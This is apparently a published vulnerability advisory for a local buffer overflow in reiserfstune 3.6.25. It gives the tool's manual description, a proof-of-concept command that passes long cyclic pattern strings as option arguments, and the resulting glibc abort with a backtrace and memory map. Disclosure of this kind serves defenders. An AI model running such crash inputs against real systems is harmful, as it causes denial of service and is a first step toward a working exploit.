reiserfstune version 3.6.25 suffers from a local buffer overflow vulnerability.
3f0a6474851e712b9ed16927423b2eaa
[+] Title: reiserfstune 3.6.25 a Local Buffer Overflow
[+] Credits / Discovery: Nassim Asrir
[+] Author Contact: [email protected] || https://www.linkedin.com/in/nassim-asrir-b73a57122/
[+] Author Company: Henceforth
[+] CVE: N/A
- Download -
http://www.linuxfromscratch.org/blfs/view/svn/postlfs/reiserfs.html
- Description -
reiserfstune is used for tuning the ReiserFS. It can change two journal
parameters (the journal size and the maximum transaction size), and it
can move the journalas location to a new specified block device. (The
old ReiserFSas journal may be kept unused, or discarded at the useras
option.) Besides that reiserfstune can store the bad block list to the
ReiserFS and set UUID and LABEL. Note: At the time of writing the
relocated journal was implemented for a special release of ReiserFS,
and was not expected to be put into the mainstream kernel until approx-
imately Linux 2.5. This means that if you have the stock kernel you
must apply a special patch. Without this patch the kernel will refuse
to mount the newly modified file system. We will charge $25 to explain
this to you if you ask us why it doesnat work.
Perhaps the most interesting application of this code is to put the
journal on a solid state disk.
device is the special file corresponding to the newly specified block
device (e.g /dev/hdXX for IDE disk partition or /dev/sdXX for
the SCSI disk partition).
- POC -
/sbin/reiserfstune '-j' 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2' '-o' 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2' '-s' 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2' '-t' 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2' '-b' 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3
- Out -
*** buffer overflow detected ***: /sbin/reiserfstune terminated
======= Backtrace: =========
/lib/x86_64-linux-gnu/libc.so.6(+0x70bcb)[0x7f00ba498bcb]
/lib/x86_64-linux-gnu/libc.so.6(__fortify_fail+0x37)[0x7f00ba521037]
/lib/x86_64-linux-gnu/libc.so.6(+0xf7170)[0x7f00ba51f170]
/lib/x86_64-linux-gnu/libc.so.6(+0xf6729)[0x7f00ba51e729]
/lib/x86_64-linux-gnu/libc.so.6(_IO_default_xsputn+0xac)[0x7f00ba49cbdc]
/lib/x86_64-linux-gnu/libc.so.6(_IO_vfprintf+0x1ebb)[0x7f00ba470bbb]
/lib/x86_64-linux-gnu/libc.so.6(__vsprintf_chk+0x8c)[0x7f00ba51e7bc]
/usr/lib/x86_64-linux-gnu/libreiserfscore.so.0(die+0xad)[0x7f00babebbfd]
/sbin/reiserfstune(+0x2f07)[0x561ea5aa7f07]
/sbin/reiserfstune(+0x1d9c)[0x561ea5aa6d9c]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf1)[0x7f00ba4482b1]
/sbin/reiserfstune(+0x2b2a)[0x561ea5aa7b2a]
======= Memory map: ========
561ea5aa5000-561ea5aaa000 r-xp 00000000 07:00 25966 /sbin/reiserfstune
561ea5ca9000-561ea5caa000 r--p 00004000 07:00 25966 /sbin/reiserfstune
561ea5caa000-561ea5cab000 rw-p 00005000 07:00 25966 /sbin/reiserfstune
561ea646d000-561ea648e000 rw-p 00000000 00:00 0 [heap]
7f00b9ff4000-7f00ba00a000 r-xp 00000000 07:00 10678 /lib/x86_64-linux-gnu/libgcc_s.so.1
7f00ba00a000-7f00ba209000 ---p 00016000 07:00 10678 /lib/x86_64-linux-gnu/libgcc_s.so.1
7f00ba209000-7f00ba20a000 r--p 00015000 07:00 10678 /lib/x86_64-linux-gnu/libgcc_s.so.1
7f00ba20a000-7f00ba20b000 rw-p 00016000 07:00 10678 /lib/x86_64-linux-gnu/libgcc_s.so.1
7f00ba20b000-7f00ba223000 r-xp 00000000 07:00 10771 /lib/x86_64-linux-gnu/libpthread-2.24.so
7f00ba223000-7f00ba422000 ---p 00018000 07:00 10771 /lib/x86_64-linux-gnu/libpthread-2.24.so
7f00ba422000-7f00ba423000 r--p 00017000 07:00 10771 /lib/x86_64-linux-gnu/libpthread-2.24.so
7f00ba423000-7f00ba424000 rw-p 00018000 07:00 10771 /lib/x86_64-linux-gnu/libpthread-2.24.so
7f00ba424000-7f00ba428000 rw-p 00000000 00:00 0
7f00ba428000-7f00ba5bd000 r-xp 00000000 07:00 10641 /lib/x86_64-linux-gnu/libc-2.24.so
7f00ba5bd000-7f00ba7bc000 ---p 00195000 07:00 10641 /lib/x86_64-linux-gnu/libc-2.24.so
7f00ba7bc000-7f00ba7c0000 r--p 00194000 07:00 10641 /lib/x86_64-linux-gnu/libc-2.24.so
7f00ba7c0000-7f00ba7c2000 rw-p 00198000 07:00 10641 /lib/x86_64-linux-gnu/libc-2.24.so
7f00ba7c2000-7f00ba7c6000 rw-p 00000000 00:00 0
7f00ba7c6000-7f00ba7ca000 r-xp 00000000 07:00 10812 /lib/x86_64-linux-gnu/libuuid.so.1.3.0
7f00ba7ca000-7f00ba9c9000 ---p 00004000 07:00 10812 /lib/x86_64-linux-gnu/libuuid.so.1.3.0
7f00ba9c9000-7f00ba9ca000 r--p 00003000 07:00 10812 /lib/x86_64-linux-gnu/libuuid.so.1.3.0
7f00ba9ca000-7f00ba9cb000 rw-p 00004000 07:00 10812 /lib/x86_64-linux-gnu/libuuid.so.1.3.0
7f00ba9cb000-7f00ba9ce000 r-xp 00000000 07:00 10650 /lib/x86_64-linux-gnu/libcom_err.so.2.1
7f00ba9ce000-7f00babcd000 ---p 00003000 07:00 10650 /lib/x86_64-linux-gnu/libcom_err.so.2.1
7f00babcd000-7f00babce000 r--p 00002000 07:00 10650 /lib/x86_64-linux-gnu/libcom_err.so.2.1
7f00babce000-7f00babcf000 rw-p 00003000 07:00 10650 /lib/x86_64-linux-gnu/libcom_err.so.2.1
7f00babcf000-7f00babf7000 r-xp 00000000 07:00 112033 /usr/lib/x86_64-linux-gnu/libreiserfscore.so.0.0.0
7f00babf7000-7f00badf6000 ---p 00028000 07:00 112033 /usr/lib/x86_64-linux-gnu/libreiserfscore.so.0.0.0
7f00badf6000-7f00badf7000 r--p 00027000 07:00 112033 /usr/lib/x86_64-linux-gnu/libreiserfscore.so.0.0.0
7f00badf7000-7f00badf8000 rw-p 00028000 07:00 112033 /usr/lib/x86_64-linux-gnu/libreiserfscore.so.0.0.0
7f00badf8000-7f00bae01000 rw-p 00000000 00:00 0
7f00bae01000-7f00bae24000 r-xp 00000000 07:00 10611 /lib/x86_64-linux-gnu/ld-2.24.so
7f00baff9000-7f00baffb000 rw-p 00000000 00:00 0
7f00bb020000-7f00bb024000 rw-p 00000000 00:00 0
7f00bb024000-7f00bb025000 r--p 00023000 07:00 10611 /lib/x86_64-linux-gnu/ld-2.24.so
7f00bb025000-7f00bb026000 rw-p 00024000 07:00 10611 /lib/x86_64-linux-gnu/ld-2.24.so
7f00bb026000-7f00bb027000 rw-p 00000000 00:00 0
7ffd3d63f000-7ffd3d664000 rw-p 00000000 00:00 0 [stack]
7ffd3d6bd000-7ffd3d6bf000 r--p 00000000 00:00 0 [vvar]
7ffd3d6bf000-7ffd3d6c1000 r-xp 00000000 00:00 0 [vdso]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]
Aborted